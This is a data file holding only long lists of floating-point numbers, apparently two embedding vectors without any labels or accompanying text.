0.015412376,0.0012655887,0.01339262,-0.0021502902,0.017488532,0.011227557,-0.0074869855,0.019455124,-0.009322856,-0.0063688406,-0.012850134,-0.10599577,-0.016469873,0.021455258,0.0015429205,0.004612894,0.006629443,0.016623756,0.009023015,0.04308543,0.018446775,-0.0056351316,-0.02176732,-0.015106501,0.0039360393,-0.011979047,-0.0024186221,-0.04315205,0.010058394,0.009119801,0.0012736709,-0.015544167,0.00087281223,0.0115552675,0.024195874,0.0017421484,0.015248796,0.0066748797,0.031522688,0.027314572,-0.015444404,0.0057916027,-0.017338337,-0.0029697954,-0.001607308,-0.047782052,-0.012226726,0.008127307,-0.013018839,0.012916925,0.007851373,-0.010422365,-0.009600525,0.0027612166,0.0134795895,0.007079473,-0.0015109377,-0.0006018274,0.020915905,-0.020581897,-0.016626721,0.006522237,0.016087972,0.016901806,-0.0056011276,0.0021471183,-0.014067201,-0.02272626,0.010049316,-0.0075947926,0.0033210497,-0.01505433,0.012761023,-0.015796652,0.007556209,-0.006324213,0.014639051,-0.016625782,-0.029266056,0.028262509,0.017225316,-0.005299485,0.030115193,0.006997336,-0.036446076,0.022299048,0.012892014,0.016752463,0.0012775892,-0.0006016758,-0.006171004,-0.0038826289,-0.022769846,0.018117752,0.008771396,-0.03519008,-0.005067826,-0.0014465854,0.009115105,-0.010154138,-0.032045882,0.0020504594,0.01761408,0.0007579224,0.031541258,0.022158323,0.004126021,0.031452555,0.006425119,0.0156207075,-0.006499623,0.0042499886,-0.0105354,0.00015459096,0.013556822,-0.021883827,0.024984047,0.030955656,-0.01609446,-0.007331015,-0.014650917,0.012277442,0.02805991,-0.015396916,0.019725237,0.005491725,0.028212888,-0.020035528,-0.00048724888,-0.030116,-0.009641175,-0.00515924,0.004239712,0.006670677,-0.02949073,-0.005441492,-0.015432233,-0.014166146,0.024433855,-0.009572648,-0.027059535,0.01103729,-0.00042729542,0.023438752,-0.00032198167,-0.0082471445,0.014429951,-0.0059905457,0.023181083,0.011760093,0.014539443,0.012146792,-0.010702142,0.014661616,-0.01196198,0.0048678135,-0.008820995,-0.009313678,-0.012824112,0.0031273023,0.014126641,-0.007844937,-0.0012231873,0.01370977,-0.0024337468,0.0036540977,0.01007075,0.0047113583,-0.014896513,-0.0016775492,0.041020975,-0.00889354,0.027920697,0.03332516,-0.015104024,0.0012744975,-0.001117621,-0.004943336,-0.0070020724,0.008834039,0.029202724,-0.0025159756,0.0048764437,0.02333697,-0.053681187,0.015316426,0.017383583,0.019824114,0.021913411,0.016597763,0.024337418,-0.018824395,-0.015918206,-0.019144127,-0.011845423,0.016689422,0.024717582,0.022053372,-0.0124730775,0.0016958519,0.018163877,0.046663694,0.0010435239,-0.011585909,-0.007214565,0.024194086,0.0014001545,-0.00023790332,0.00011130132,-0.01211159,-0.0055072852,-0.03822831,0.007153367,0.017198004,-0.010806028,-0.012234149,0.010784829,0.0015499799,0.046845745,0.0035328732,-0.021967255,-0.0162703,0.017561493,-0.022653272,-0.021484561,0.0013345577,0.013263004,0.0024263298,-0.021078842,0.0117608365,-0.0018501725,-0.006571253,-0.0041407677,0.012633965,-0.023088146,-0.023008183,0.027641432,0.03556608,0.012624762,-0.0067582764,-0.021486208,-0.0076523507,0.0044431053,-0.036404647,0.0039014262,0.010178147,-0.006287182,-0.0063944487,0.01961139,0.006768909,0.01892799,0.019207764,0.008100706,0.033505294,0.010602148,0.028901981,0.026397653,-0.00037319807,-0.0119245555,0.022421852,0.046186287,0.0064219697,-0.012229532,0.0007735768,0.00093039655,0.0084466925,-0.017747758,-0.011891467,0.023168283,-0.016624413,0.014555526,-0.014401568,0.0005205751,-0.021813069,0.00024925044,-0.014712581,0.0072555835,0.005137894,-0.0029348172,-0.0041689016,-0.021764155,0.006028258,0.016880939,-0.016323846,0.008089322,-0.030842021,-0.0054730917,0.016263127,-0.0067016645,0.012370748,-0.0032015096,-0.0029236055,0.007303061,-0.018783102,0.0142910015,-0.0030348557,0.021670664,0.011476909,0.000013550336,-0.017644197,-0.008609546,-0.020218642,-0.003570824,0.007689762,-0.001854306,0.0038552692,0.030931935,0.025645362,-0.0002599533,0.0008901931,0.011693449,0.016871579,-0.013997278,-0.028996544,0.0009965313,0.0013520892,0.005008533,-0.0017551271,0.03438503,0.014591686,-0.0016364623,-0.011216502,-0.005610687,-0.018125677,0.03224584,0.0080019375,-0.008513817,-0.015581324,-0.012045581,-0.030106336,-0.012424236,-0.014533317,-0.0002450227,-0.0017004048,-0.006244651,0.014077114,-0.0014177712,-0.0045859735,0.035690147,-0.033725534,-0.0031481225,0.008644869,-0.036057893,-0.015041928,-0.020037701,0.015757916,-0.0046281363,0.009528171,0.023744833,-0.004539699,0.023515726,-0.016529946,0.010857812,0.013804038,-0.008949525,0.022181269,0.023273287,-0.0008336524,0.010501441,0.0006711196,0.0012038054,0.0029395388,0.003496861,0.026370458,-0.009026874,-0.02151158,0.018051442,-0.031463534,-0.015771179,0.010089565,0.04089916,-0.030162929,0.0022050042,-0.0197514,-0.03155304,0.005539704,0.006631695,-0.024716768,0.016728956,-0.018199993,-0.009641801,0.014748727,0.01214852,-0.024988106,-0.017285356,-0.0047319694,-0.10115218,-0.012912954,0.0074032056,-0.0044511775,0.03663769,-0.0257842,0.00012104184,-0.0144579625,0.00024221517,0.0160361,0.0023009316,-0.007934606,-0.009182052,0.0035928956,0.04307768,-0.006620558,0.0008876838,0.008509422,-0.005169164,-0.03422925,-0.0019990501,-0.005567807,-0.033122644,-0.009187754,0.0142464815,-0.0065799626,-0.011294276,-0.018272867,0.0015121095,0.001882355,0.0076881633,0.012909349,-0.005132842,0.00026240366,-0.027027942,0.015090703,-0.008074418,0.019650845,-0.005736033,-0.021084689,0.008577141,-0.0026636606,-0.00003522988,0.019356506,-0.01928133,-0.0075588967,-0.019194437,0.004609866,-0.0013121648,0.0028817193,-0.005889413,0.028422212,0.0029850747,0.030874519,0.019606529,0.017884953,0.01131608,-0.012671616,0.027125686,0.002531554,-0.0012155407,-0.0064872843,0.023941135,0.0015048208,-0.008793038,0.022816226,-0.01227571,-0.0051078675,0.008931013,0.028095702,0.00927322,-0.009348529,0.010507548,-0.016367983,-0.0061379573,0.008854908,0.007936707,-0.00674725,-0.020598948,0.0046267994,0.05267438,-0.0058154026,0.028840486,0.012545946,-0.0040165507,-0.00066429336,-0.0033713405,-0.008670486,0.024749152,-0.019857394,-0.024485294,-0.020003757,0.044392746,0.008937853,0.0028640989,0.011103655,0.013028761,0.0097672045,-0.008052621,0.004891665,-0.0052843476,0.0044423374,0.00045295912,-0.007854314,-0.028480724,0.0057942425,-0.023136359,0.010448383,-0.008158703,-0.025100334,0.0018727604,0.040310245,0.070652455,0.017731985,0.019069865,0.016892651,-0.011676564,-0.0041260915,0.003806592,-0.02448157,0.0053581404,0.019881994,-0.012959654,0.035274163,0.018130811,-0.010103923,0.004950784,0.019313732,-0.014292003,0.0354577,0.009425679,0.0014832623,0.015794568,0.019474331,-0.010146522,-0.009880192,0.011795031,0.03665219,-0.009686743,0.007939804,0.00013317332,-0.008126649,0.011739579,-0.019900933,-0.002696369,0.0075600063,-0.007764736,0.006421776,-0.0006538987,-0.012998858,-0.0055081975,-0.023974547,-0.012667523,0.00094702805,-0.01538534,-0.018679421,-0.014533203,0.004764877,-0.028752578,-0.019844288,0.006215356,0.020761367,-0.0024780212,-0.00260322,-0.03792776,0.014369536,0.0053581665,-0.0056238878,0.009904081,0.0061983215,-0.029239153,-0.015311639,-0.010411726,-0.010602923,-0.011496802,0.00087649963,0.03230027,0.03202962,-0.0030415931,-0.0045861653,-0.014975168,0.008032404,-0.010336461,-0.01112572,0.008022526,-0.012919502,0.013713029,0.009463523,0.013674227,0.00081374333,-0.003861286,-0.010016707,0.00106812,-0.02844594,-0.009369256,-0.011739579,-0.0008560554,-0.007731203,-0.025073193,0.022658268,0.013402099,0.016320666,-0.013862973,0.01712337,0.046697024,0.025678137,-0.011075553,0.023560805,0.004877706,0.008542081,-0.013069176,0.01830501,0.0050627966,0.087755784,0.013366927,-0.007600373,-0.014825469,-0.008720386,0.0016039837,0.0108609395,0.00904636,0.0018601806,0.013795616,0.018251162,0.0034366674,0.02418522,0.0084361425,-0.004874828,0.026697582,0.001038611,-0.017775243,-0.00025846798,0.014553036,0.016018635,-0.0046060565,-0.027785705,-0.04277022,-0.029365407,-0.06930144,0.03928141,0.022174444,-0.0034635784,0.023075515,0.011151248,-0.0016531318,0.006046434,-0.0011605181,-0.014400145,-0.010250725,0.00022126589,-0.015343526,0.0065742005,0.012470365,0.015686836,0.011739069,-0.01880524,-0.01889769,-0.030694883,-0.023118561,-0.00032697053,-0.0073640742,-0.0073438003,-0.010633885,0.0012909083,0.00024790663,0.015210596,0.023313545,0.02187625,-0.008017555,-0.0005478145,0.0024680987,0.0067967214,-0.008890577,0.007607815,0.007187918,0.01081783,-0.0067218663,0.010138677,-0.0040730564,-0.010090787,-0.017778538,-0.015856735,-0.0027958623,0.033098463,0.013447856,0.0041858642,-0.011164433,0.0146622965,0.014068091,-0.008987425,0.014291123,-0.020347824,0.00081040093,0.0037475622,-0.011688353,0.0111362925,-0.00047374633,0.018671203,-0.0030703843,-0.02489348,0.009540032,0.01043574,-0.020167498,-0.0028077094,0.029901475,0.018144011,0.02339216,-0.014746165,0.0023459212,0.0265989,-0.016416203,-0.032939713,-0.013160059,-0.01330545,-0.0058990656,0.009456517,0.000018609868,0.009699765,-0.0108921155,-0.005287019,0.02277618,-0.0089048995,0.006194991,-0.008131401,0.02470087,0.0007915077,0.008226275,-0.006048432,0.01604278,-0.013403614,-0.016891437,0.00854853,-0.031094294,-0.0021473996,-0.0003699055,0.009157806,0.0534611,0.019688053,0.011749887,-0.0221804,-0.004609878,-0.023135355,0.0092465915,0.002854487,-0.023759378,0.012438158,0.009756201,-0.005272341,-0.00063592894,0.043122016,-0.017462,0.0326074,-0.014920393,0.0110516595,-0.012311308,-0.013268774,-0.015668899,-0.00401978,-0.018051093,0.025042992,0.01505439,0.010858057,-0.017868739,-0.006130743,0.01991722,0.0063267467,-0.0030268887,-0.003289081,0.008064709,0.0022634282,-0.0015786763,-0.020471655,-0.007923567,0.021747971,-0.0017447526,0.019701522,-0.05130461,0.03223296,0.010556048,0.001983574,0.001759974,0.012000532,0.011163343,-0.026602622,-0.009766103,0.020894594,-0.0051774047,-0.016436834,0.024895238,0.019786743,0.029621676,0.01431733,0.0071469997,0.018176796,0.011459984,-0.025511412,0.006587281,0.010410292,0.00032122718,0.0036307948,0.014284613,-0.013942205,0.020189496,0.01163431,-0.002969982,0.0028130047,0.016316056,0.019494938,0.0047961893,-0.024546407,0.049275264,-0.03817074,-0.025758436,0.008116872,0.0010630615,0.015763503,-0.00016698678,0.0118796155,-0.009097195,-0.010158917,-0.019167027,0.013523796,-0.03589316,0.025738439,-0.0030195033,-0.02345313,-0.02701214,-0.0013429804,0.0066382247,0.0018311966,-0.015632067,0.007490058,-0.013464795,0.0057815523,0.009454322,0.03038418,0.023064699,-0.0071025803,-0.009677098,-0.015292094,-0.0033483976,0.0031303528,-0.00816462,-0.016995251,-0.0035828778,0.0062076086,-0.012926802,-0.00040708648,-0.014881531,0.01041932,0.024810202,0.0148277655,0.004755405,-0.019722147,0.0057560764,0.0015977909,-0.0009975735,-0.0127238855,-0.020715384,0.0075240494,-0.0038733284,-0.0055396096,-0.021412348,-0.014417954,-0.0034671687,0.00035364117,-0.0136882,-0.006631043,-0.008324891,-0.024684325,0.0005308235,0.026386093,-0.020073581,0.012678728,0.022351544,0.010340445,0.0145258,-0.007976269,-0.017182862,0.005326692,-0.02968484,-0.0014186972,0.014612853,0.0053521856,0.008081726,-0.006684362,0.036579054,0.012697631,-0.0058886628,-0.0018372313,0.009434801,-0.004230398,0.003596907,0.023815975,-0.026804917,-0.006796911,-0.014762966,0.013417341,-0.018079227,-0.022076532,0.0007980417,0.07624034,-0.07023352,0.0071512386,0.023074023,0.020648856,-0.03754269,0.010135439,0.0026176516,-0.0076154945,-0.008767885,0.017248709,0.0069120596,-0.0044070766,-0.021053603,0.0068062367,-0.011158297,-0.018556442,-0.022474505,0.015388836,-0.027383728,-0.029652927,0.029866371,0.012957842,0.00065587525,-0.023102127,0.016775316,-0.005727597,-0.009799252,-0.014214827,-0.0029565436,0.0052572116,0.015771149,0.017541239,-0.016986309,-0.0008895914,0.025629234,-0.0007243221,0.031161038,0.008773493,-0.015149982,-0.02836348,-0.0021910951,-0.013161062,0.0023691598,0.0048541347,-0.016430706,-0.014183567,0.007373151,-0.00046290542,0.10920223,-0.035306755,-0.015542815,-0.008142952,0.0053331656,-0.015183129,0.0048313993,0.021211445,0.015871,0.015883744,0.012531192,0.002001742,-0.02402488,0.021773549,-0.00033664663,0.005047636,-0.0034181552,0.12705618,0.0028147802,0.0069541703,-0.0052472837,0.018093918,0.021435168,0.012220458,-0.00084299047,-0.06758901,-0.010535163,-0.018219572,-0.007098105,-0.021645486,-0.027125174,0.0021288712,-0.007897782,0.026392883,0.0027955428,0.008895329,0.012259844,0.00083485234,-0.04022033,-0.0055201375,-0.0068846615,-0.013761969,-0.0010717383,0.014633478,-0.034243077,0.020231199,-0.030998087,-0.0077512683,-0.0064957496,0.029700978,0.009888621,-0.009099658,0.02017081,0.01813676,0.02250341,0.0013872841,0.016678736,0.0053065065,-0.0452045,0.031355478,-0.00024961663,0.04355551,0.009287356,0.017726252,-0.011117498,-0.012288743,-0.023342563,0.0058925017,-0.008626357,0.025590662,0.0063892426,0.0104031935,-0.011425338,-0.019803528,0.016709598,0.0053150877,-0.0076967683,0.005888254,0.016931152,0.010204231,0.0163662,-0.0079125995,-0.0053819115,0.020352056,0.037922315,0.0034480484,-0.016253028,0.006533791,0.01267688,-0.0019848133,-0.010102385,-0.002532605,0.0037308354,0.013246789,0.03208621,0.033948738,0.012241156,-0.010351564,-0.004879308,-0.010626079,0.003997056,0.0018213241,-0.023493743,0.0065032337,0.0043185013,0.020787042,-0.013686696,-0.034617677,0.013697023,-0.00873579,-0.005096983,0.0023992818,-0.015183265,0.009030812,0.0025332205,-0.016798692,-0.010604914,-0.009969722,-0.04607024,-0.0030126038,-0.0027287384,-0.017858904,-0.0034692946,0.019982457,-0.025550006,-0.0007126605,0.026963515,-0.0018117154,-0.008579721,0.002321368,-0.009084552,-0.0027008436,0.00069573795,0.047866922,-0.0012084913,-0.02058393,0.010327737,-0.020271625,-0.039795283,-0.01268455,0.015712915,0.017406503,0.010424737,-0.0037865692,-0.009412816,-0.019661741,0.014736844,0.0015437442],[0.0018561246,0.021213429,-0.024260191,-0.022499256,0.024415724,-0.019895624,0.01922834,0.028117485,0.0036568786,-0.018051725,0.016987858,0.004071698,0.0059351455,-0.0041639856,0.007533836,0.012606903,-0.010888487,-0.00216061,0.006291339,-0.008412232,0.005417489,-0.00448054,0.016943144,-0.0050404095,0.0019584612,0.00031834038,-0.005984507,-0.008175041,0.02183247,0.003907481,0.0071266848,0.025004786,0.006077545,0.043435913,0.021982156,-0.00075900985,-0.028696213,-0.014955803,0.016590454,0.0069385977,-0.0128377825,0.012144933,0.002813154,0.02877418,0.01046893,-0.008306137,-0.00584874,-0.00066082145,-0.0031664763,0.007347417,0.009932821,0.0017376426,-0.040945705,0.0148511,-0.005261486,-0.017404526,-0.005754018,-0.037668012,0.028665757,-0.016441263,-0.0055599115,0.0030103293,0.0140798,-0.029502463,0.038483273,0.0019579576,-0.014312012,-0.03310443,0.0037757023,-0.017392267,0.015331271,0.017269326,0.0047902702,-0.010828017,0.028007869,0.0119480565,-0.01171994,-0.002384398,-0.01665797,0.008467027,-0.019662607,-0.0089072315,-0.0022060466,-0.0026422387,0.016809158,0.036992434,0.011098325,-0.0027312543,-0.0048929285,-0.008515302,0.0007399974,0.005954491,0.013266612,0.004137705,-0.008175054,-0.001575529,0.0035679198,-0.013984504,-0.0016922504,0.005302468,-0.014008946,-0.00741577,-0.0098170005,0.0040879208,-0.0024674276,-0.0041161417,-0.0017499105,-0.02417724,0.0043473616,-0.007251476,-0.0014325423,-0.0016634981,0.009878026,0.008808832,-0.025240827,0.019948598,-0.012496039,0.008427919,-0.0091834795,-0.004709337,0.0022386173,0.014700512,0.0068275905,-0.0074082687,-0.034287192,0.00808505,-0.002113304,0.031594384,-0.0038675268,0.007828085,-0.009623063,-0.0053600054,-0.010028618,-0.014527427,-0.00084404845,-0.001622359,0.01032143,0.0008278553,-0.0135871945,-0.009800976,0.031634793,-0.0076413206,0.012852574,-0.009540622,0.012818707,0.02143486,-0.0006025059,0.007003624,0.015850157,-0.010810263,0.031285815,-0.0056727906,0.011542885,0.0013060236,0.0066030505,0.034329854,0.0034230757,-0.02539385,-0.013651581,-0.021256601,-0.0014297545,-0.004540746,0.002175424,-0.0018843295,-0.008641755,-0.030364214,-0.010178031,-0.010517356,-0.024309592,-0.004881962,0.020763367,0.026304346,0.020126613,0.010336807,-0.004828231,0.014233835,-0.011482849,0.011166633,-0.0010274301,-0.0037728173,0.014629368,0.00347537,0.0009375476,-0.006961342,-0.007171401,0.026281882,0.026353791,0.0263046,-0.013334168,-0.008685024,0.01172921,-0.0185261,0.021647159,0.007843916,-0.013580467,-0.014029093,0.003657611,0.07579662,-0.026424529,0.0041495343,0.0058768936,-0.0034573982,0.0065970183,-0.034350112,-0.01282943,0.006419356,0.00024523647,-0.008477022,0.0026804574,0.0033424043,0.026032226,-0.014409001,-0.012814443,0.0016399391,-0.024939617,-0.053874318,0.020441994,-0.011110603,-0.0035056937,-0.005313389,-0.019857615,0.0060534645,-0.0076915696,-0.017208045,-0.0025866604,-0.022202749,-0.010372497,0.007663584,-0.02115921,-0.021997437,0.006852518,-0.00016208763,0.002647777,-0.021505347,0.014264794,-0.00794713,-0.0053714593,-0.02179962,-0.015440716,0.0006982292,-0.0007606064,0.014045397,0.0058015455,0.022476075,-0.016236557,-0.0063275993,-0.006302397,-0.017074415,0.006223797,0.039709587,-0.015416748,0.0057876245,0.023240628,0.03129891,-0.0050632968,-0.013898729,0.019271638,-0.019065466,-0.0050333813,0.0010560253,0.041246407,0.025936762,-0.014268996,0.030345386,0.027617052,-0.008151587,-0.015918653,-0.035029367,-0.0061547724,-0.025134647,-0.02058583,-0.0010588297,0.022476155,-0.008596959,0.01034698,-0.00032206895,0.009725132,-0.015411249,0.00004373997,-0.006687183,0.000034023557,0.009748864,0.0122269485,-0.0178881,0.00075690704,0.021413293,-0.016076852,0.006225935,0.03171107,-0.0018399308,0.013645308,0.002957337,0.03532582,-0.0028196133,-0.020392064,0.009895186,-0.015303173,0.022268299,0.022678833,-0.019252185,-0.0063702883,-0.013599501,0.014315336,-0.0057952804,0.011455775,-0.005603872,-0.017175343,0.0380842,-0.03218822,0.017633647,-0.052930366,-0.027936542,-0.025309687,0.00217808,0.0056923465,0.0056499164,-0.010113069,0.005275082,-0.023545627,-0.0033431759,0.0029473002,-0.025201987,0.02494128,-0.016647968,-0.014929681,-0.008820656,-0.000032483116,-0.00975845,0.013656227,0.004864931,-0.0040410724,-0.00050221104,0.029680591,0.02696693,-0.024220357,0.004327046,-0.0028510639,0.018219264,0.008789903,-0.028462453,-0.009591359,-0.03189403,-0.005191726,0.016290188,0.0043372815,-0.0062078773,0.013791404,0.001823855,0.005895563,0.023629252,0.032267384,-0.02615756,-0.010822757,-0.008789662,-0.02636446,-0.005268827,-0.010876191,-0.028799873,0.009731753,-0.005934344,0.052517515,-0.0047202185,0.003522512,0.00061522616,0.07225155,0.018573714,-0.014792681,0.003846531,-0.007452371,0.012083275,0.034751628,0.019022206,0.0063918326,0.0066690007,-0.0098509295,0.0073799365,-0.004489663,0.030079238,0.0020126076,0.0062053245,-0.023787532,-0.017872274,-0.03648343,-0.014675792,0.005871244,-0.002944285,-0.009392875,0.006521478,0.0114011,0.026242126,0.02185337,0.010997354,0.011017182,-0.016216934,0.0066168616,0.027246315,0.0320677,0.012360119,-0.02228774,0.011866044,0.028567681,0.0026469515,-0.047958814,-0.010471745,0.01241351,0.03352934,-0.014279476,-0.028446615,-0.0045416113,0.043880638,-0.0045513622,-0.0012838404,-0.010976864,0.03225421,0.008470482,0.00242556,-0.012407946,0.00687565,-0.018043214,0.020886052,0.0028426454,-0.046916686,0.0341644,0.031396177,0.0019067344,0.026172208,-0.006167413,0.0030039041,-0.0038513863,0.010540684,-0.010102995,-0.009861082,0.0005185625,0.007180485,0.0030961868,0.009293829,0.0011164268,-0.0074977987,-0.010456397,0.013102484,0.0070768166,-0.0108237555,0.009310959,0.056232125,-0.011864443,-0.007087134,-0.0011754106,0.013248471,0.01580662,0.004838331,-0.005145382,-0.0070075905,0.019726925,-0.02472904,0.015033095,-0.017526962,0.006836498,0.015549575,0.002499631,0.009880186,0.015400029,0.021482117,-0.0033452741,-0.0031410821,0.003264121,0.0028937217,-0.0057009356,-0.020514565,-0.011315871,0.008749735,0.017709602,0.0035724493,0.0027231893,0.0386627,-0.023317298,0.017299451,-0.0033397272,-0.014736927,0.018742755,-0.0079371985,0.0032450496,-0.009367327,-0.008675006,-0.008146697,0.034191307,-0.0035712952,-0.0076169902,0.0093986755,0.016109254,-0.0056166844,-0.011050733,-0.033212177,0.009850829,0.022905553,0.0022689896,0.009706796,-0.003358714,-0.036555808,0.021891102,0.007888824,-0.010219124,-0.015669858,0.036230814,0.015900541,0.009018799,0.028902797,0.019057611,0.0025990307,-0.0031458081,0.035421528,0.0418211,-0.007122191,-0.023637844,0.0011406704,-0.011251336,-0.004770075,0.008237599,-0.012284074,-0.0007081181,0.007682643,0.042132955,0.008359025,-0.0013522455,-0.004395785,0.018180806,-0.0441763,0.0075743548,-0.0017156476,-0.015421022,0.029549854,-0.0043550916,0.0575414,0.00007989446,-0.02826991,-0.008377511,0.031713597,0.015232607,-0.006467865,-0.0020097718,-0.010278828,-0.010019934,-0.0054366565,0.016097948,-0.028047549,0.019906221,-0.01270788,-0.0028338975,0.008323249,-0.009630645,-0.013340083,-0.0077699875,0.0034036438,-0.005387324,0.003834473,-0.016105779,-0.023037136,0.018821845,0.02944869,0.00874393,-0.03675237,-0.010011696,-0.009952394,0.024036383,0.016458888,-0.0009379432,-0.006879839,0.0058462434,-0.0018261313,-0.008364676,-0.010715328,0.049667176,0.0036763456,-0.0053292643,0.0137812905,0.02667942,0.023137582,-0.0012813547,0.018466812,0.019681074,0.025068386,-0.0028771162,-0.004845087,0.024907947,0.0224385,0.0039753807,-0.018196419,-0.001972988,-0.019671302,0.0061414037,-0.01408745,0.009184011,0.008287939,0.0031943808,-0.02657577,-0.009730224,-0.029631812,-0.01910231,0.0015240172,-0.003324615,0.0011824829,-0.020871453,-0.0044805296,0.0037562293,-0.0074193706,-0.008504894,0.00077720085,0.015255479,0.012321183,0.016423859,0.014984402,-0.003968153,0.000013527093,0.011520842,-0.004756256,-0.004370343,0.02095651,0.006675118,-0.017026072,0.0067423955,0.0011990753,0.001163905,0.000992059,-0.0062627126,0.0045809834,0.009997563,0.017170101,-0.0034144798,0.026078004,-0.024038892,-0.0031467902,0.014667337,-0.01815678,0.0067622988,-0.01709949,0.019827617,-0.003933932,0.002530696,0.0059153177,-0.0065255216,-0.017553974,0.003342192,0.035601117,-0.042810183,0.00544364,-0.0054414654,0.0017743717,-0.008733084,0.022521604,-0.019620072,0.017493714,-0.01057708,-0.010995566,-0.00015142615,0.008651082,-0.015343997,-0.0029808527,0.01606259,0.007942982,-0.026862478,-0.016579382,-0.010517542,-0.05475903,-0.023592984,0.015580537,0.016911304,0.0016549985,0.0028502026,0.0007668371,0.006061456,-0.008327856,0.003455735,-0.040410824,0.00907431,0.003790945,-0.0472378,0.008174873,-0.016401675,-0.008030137,-0.0032353452,-0.02829401,0.004537279,-0.005981989,0.013908082,-0.011176837,-0.009369742,0.011037263,-0.0076850676,0.033532467,-0.009059042,0.015642295,0.015310629,0.028972855,-0.002447587,-0.0052352287,-0.0051498087,0.007922338,-0.023773152,0.0056162598,0.020680953,0.026422964,-0.00017200845,0.023098422,0.014800958,-0.010831691,0.012194784,-0.0060735894,-0.010412516,0.040858902,0.0023759066,-0.0018769117,0.012857687,-0.009882789,0.019838732,-0.013150555,-0.030019294,-0.00047635697,0.0012410677,0.006637256,0.0067522186,0.03648592,-0.004932713,0.00743271,-0.019112285,-0.003902176,-0.012787199,0.01844847,0.018759832,-0.0033193182,0.016216256,-0.0028077003,-0.0013961684,-0.0039271824,0.003090249,-0.027441707,-0.013976656,-0.029585987,0.019810885,-0.02269967,-0.008789414,-0.05973585,0.013099237,0.020103477,0.013425659,0.011717454,-0.02515622,0.019406207,-0.013292011,-0.0050470047,-0.012046292,-0.03872016,0.0068311547,0.020905402,-0.03152898,0.0070085493,0.02680831,0.00703592,-0.016067402,0.0058069355,-0.0062156995,-0.01996386,0.0068436423,-0.009978098,-0.0014781015,0.005486803,0.031551376,0.010074211,0.000014859987,-0.0047961217,-0.0022428064,-0.007126778,0.011924471,0.003761733,0.00001431738,-0.015353399,0.0073693558,-0.030075414,-0.01446111,-0.0044596996,0.015735682,-0.053181704,-0.0025644253,-0.0030476686,0.0004481038,-0.012176015,0.025717944,-0.011867302,0.057874143,0.017433295,-0.008874987,0.00015513081,-0.004249896,0.0049208915,0.018557824,0.027947754,0.002682422,-0.052528176,0.00717179,0.028473165,0.010950147,0.035860877,0.0063842903,-0.019752193,-0.024012636,-0.032740172,0.0044122883,-0.012183203,0.012738362,0.011590763,-0.041134253,0.023103025,-0.018674193,0.01277616,0.024564432,0.023193674,0.008711202,0.009940747,-0.013030829,-0.04014713,0.012973934,-0.006239537,-0.010589148,-0.01919021,0.01402754,-0.032132093,-0.014804919,-0.027107734,-0.0059302677,-0.0076285717,0.025588421,0.009376945,-0.0006118651,-0.0059106695,0.02558855,0.005077472,0.017549366,-0.020459112,-0.016937492,0.015909012,0.007006662,0.012586682,0.008246693,-0.0011155134,0.041271992,-0.000119224904,-0.011720704,0.005200705,-0.014442007,0.007676215,-0.0070215804,0.02384615,0.0072049256,-0.01446345,0.023353416,-0.017638084,-0.008013246,0.033778068,-0.004909131,-0.012192979,-0.019059654,-0.020571057,-0.014028456,-0.01187739,0.011591235,-0.019837217,0.018853135,0.0101145655,-0.025795823,0.0077628205,0.00845754,0.018524487,-0.0023273637,0.011063062,0.013234702,-0.00065332814,-0.033819437,-0.005540198,-0.0027450914,-0.006406007,0.007420726,0.00679861,0.009391221,0.0139179565,0.027523223,0.0036904833,-0.0030762616,0.01304305,-0.0077461735,0.0221588,-0.0074627604,0.022336904,-0.0026295464,-0.002738113,0.015314957,-0.03576477,-0.02684046,-0.0053671906,-0.004495358,0.004915477,-0.027070357,0.0069219335,-0.011408866,-0.014874168,0.02232499,-0.010374226,0.007336629,-0.015597426,0.016754951,-0.0032927408,-0.011684156,0.01573039,0.0058076046,-0.010910422,0.0042996197,0.007603418,-0.0019288022,0.013832982,0.0042083967,-0.0026972685,0.0078607295,-0.008073114,-0.0025612612,0.0018589074,0.0018444416,0.005350576,0.044961315,0.016263302,0.0020429064,-0.022407364,-0.02587304,-0.011710872,-0.015795527,-0.008990001,-0.012053212,0.018952427,0.014414651,-0.022465507,-0.030346738,-0.02526025,-0.051069032,0.039088238,-0.02636992,-0.006693206,0.016853444,-0.018713906,-0.0032515663,0.010406811,0.016408049,-0.005156474,0.014747773,-0.005009579,0.01325791,0.00022387628,0.004409998,0.008341627,-0.0073841745,0.013986905,0.035435338,0.00048772545,0.017207474,-0.0022239105,0.0019192783,-0.014921265,0.027374145,0.028668942,-0.0025450776,0.0019264679,-0.028361278,0.013356863,0.0041454793,0.009285529,0.0015717648,-0.0032292267,-0.030171532,-0.0052031735,0.0067381873,0.002770511,-0.02106924,0.011970858,-0.010758936,0.0020164833,-0.012540852,0.027276771,-0.015498099,-0.029983059,0.014695458,-0.021378733,-0.0017000261,-0.008524161,0.017307779,-0.004759676,-0.025210919,0.0046457723,0.017682165,0.02061891,-0.010173764,0.013990902,0.024383212,0.004614163,-0.0061954507,0.0039509367,-0.0005090135,0.029264858,-0.0196367,-0.0073525608,-0.012038453,0.022880875,-0.010007805,-0.0057602674,-0.019209744,-0.021783307,-0.022735966,0.02664415,-0.019856574,0.022603221,-0.041284736,-0.023351494,-0.0113296015,-0.036770687,-0.007622033,0.0031190268,-0.031198945,-0.00677395,-0.020798063,-0.012428722,0.0085041635,-0.0057427622,0.0102019515,-0.023965511,-0.02021584,0.0041407584,0.0037296792,0.016343303,0.019786438,0.024338288,-0.003231904,-0.023839211,-0.002480127,-0.008006227,0.012749705,-0.031193282,-0.00083829934,0.03150061,0.008253217,0.000742907,-0.013277389,0.016729197,-0.000708074,0.036739137,0.001577202,0.03912202,0.007973017,-0.011541502,0.0027969277,-0.00697327,0.003310549,0.013981976,0.023155088,0.032186024,0.0025182876,-0.006538829,0.014132472,0.013953162,-0.0072875186,0.02962865,0.017887292,0.0060657435,-0.026069254,0.032103587,-0.018989742,0.03983011,0.03278428,-0.0034167343,0.022777265,0.020096052,0.008212946,-0.021309406,-0.01837433,-0.005425071,-0.019117126,-0.012181059,-0.010414629,-0.005721907,0.023634283,-0.007909661,0.019624164,0.003810157,-0.0026050406,-0.007403882,-0.0017952407,-0.007554041,0.00063685677,0.018992726,0.0046663363,-0.0107668955,-0.0060682213,-0.024931932,0.012901539,0.0175395,-0.0102660395,-0.015150518,0.0060621575,0.020961123,-0.012186583,-0.00629926,-0.013832643,0.00812023,-0.0162376,0.0031880639,0.0038436733,0.0336349,-0.013427366,0.019206055,-0.0066594114,-0.0016849098,0.037773173,0.027481472,-0.006978902,0.0133565385,0.0021309243,0.031655636,0.017459042,0.00858929,-0.027112985,-0.018135129,-0.0069526224,-0.010524349,-0.0046986407,-0.02115821,0.009451903,-0.010483741,0.01056446,-0.017839195,-0.025815237,0.0230398,